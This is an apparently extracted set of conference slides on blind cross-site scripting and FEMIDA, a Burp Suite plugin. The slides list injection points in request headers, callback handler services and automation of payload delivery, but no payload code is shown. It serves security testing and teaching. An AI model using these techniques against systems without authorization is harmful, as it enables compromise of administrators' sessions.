![Page 1: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/1.jpg)
BLIND XSS & FEMIDA
Pavel Rukavishnikov
hd
![Page 2: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/2.jpg)
whoami
Pavel Rukavishnikov
• Ctf player
• programmer
Github: https://github.com/wish-i-was
Twitter: https://twitter.com/wish_iwas
HD
• Script kiddie
• Bounty hunter
• pentester
Github: https://github.com/HD421
Twitter: https://twitter.com/hd_421
![Page 3: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/3.jpg)
Agenda
•What is blind xss?
• How to deal with it
•Where to inject
• Callback handlers
• How to improve and automate
• TODO
![Page 4: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/4.jpg)
Few facts about blind xss?
• Almost always it’s stored• You can’t see alert(1337)
• need your patience
• facing it the other way
![Page 5: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/5.jpg)
Where to inject
Headers:
• User-Agent
• Referer
• Origin
• X-Forwarded-For
Request parameters:
• imagination
![Page 6: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/6.jpg)
Ground control
your target is to receive a knock-knock from
Application used by administrator/team member
payload
payload
payload
payload
payload
payload
payload
payload
paylo
ad
pa
ylo
ad
![Page 7: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/7.jpg)
Few more
payload
payload
payload
![Page 8: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/8.jpg)
CSP report
How It look sometimes
• Almost always request is static (except custom csp
reporting frameworks like
sentry csp)
• Processing servers are oftenly poorly protected
![Page 9: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/9.jpg)
Should I look for it?
![Page 10: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/10.jpg)
Callback handlers
![Page 11: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/11.jpg)
Callback handlers
![Page 12: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/12.jpg)
Callback handlers
Callback tokenSSRF
XXE
XXS
https://github.com/jobertabma/ground-control
![Page 15: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/15.jpg)
Callback handlers
Launch your own Collaborator Server:
https://blog.fabiopires.pt/running-your-instance-of-burp-collaborator-server/
![Page 16: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/16.jpg)
What can be simplified?
Daily routine looks like:
1. intercept the request
2. Put payload in correct header/parameter
3. Send request
4.Repeat n-times b/c you never know what will
be logged at backend
![Page 17: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/17.jpg)
Should we perform manual check all the
time?
Automated
Manual
![Page 18: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/18.jpg)
FEMIDA
Who is femida?
Burp Suite plugin that:
• Flexible and easy
configurable
• Performs accurate
passive checks
• Active scan
![Page 19: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/19.jpg)
FEMIDA
PLUGIN DEMO HERE
![Page 20: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/20.jpg)
TODO
• CSP report detector and request
generator
•WAF detector
• Etc…
![Page 21: BLIND XSS & FEMIDA - ZeroNights...FEMIDA Who is femida ? Burp Suite plugin that:! Flexible and easy configurable! Performs accurate passive checks! Active scan FEMIDA PLUGIN DEMO HERE](https://reader033.vdocument.in/reader033/viewer/2022052800/5f0fbaaf7e708231d44598da/html5/thumbnails/21.jpg)
We wish you Happy hacking
Thank you for attention
Fell free to ask your questions:
Twitter:
• https://twitter.com/hd_421
• https://twitter.com/wish_iwas
Plugin: https://github.com/wish-i-was/femida